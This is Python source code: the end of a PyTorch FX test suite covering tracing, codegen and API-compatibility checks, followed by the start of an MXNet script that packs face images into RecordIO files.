assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_custom_codegen_with_transformer(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
self.assertEqual(nf(vals), f(*vals))
transformed_gm = Transformer(nf).transform()
self.assertEqual(nf(vals), transformed_gm(vals))
def test_interpreter_with_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def generate_output(self, output_args):
return f'return list({repr(output_args)})'
def process_outputs(self, outputs):
return list(outputs)
def f(a, b):
a = a + b
b = a + b
return a, b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
self.assertEqual(Interpreter(nf).run(vals), nf(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
super().setUp()
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
import numpy as np
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
# with open(fullpath, 'rb') as fin:
# img = fin.read()
# s = mx.recordio.pack(header, img)
img = cv2.imread(fullpath, args.color)
det = item.bbox
margin = 44
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0] - margin / 2, 0)
bb[1] = np.maximum(det[1] - margin / 2, 0)
bb[2] = np.minimum(det[2] + margin / 2, img.shape[1])
bb[3] = np.minimum(det[3] + margin / 2, img.shape[0])
img = img[bb[1]:bb[3], bb[0]:bb[2], :]
img = cv2.resize(img, (224, 224))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
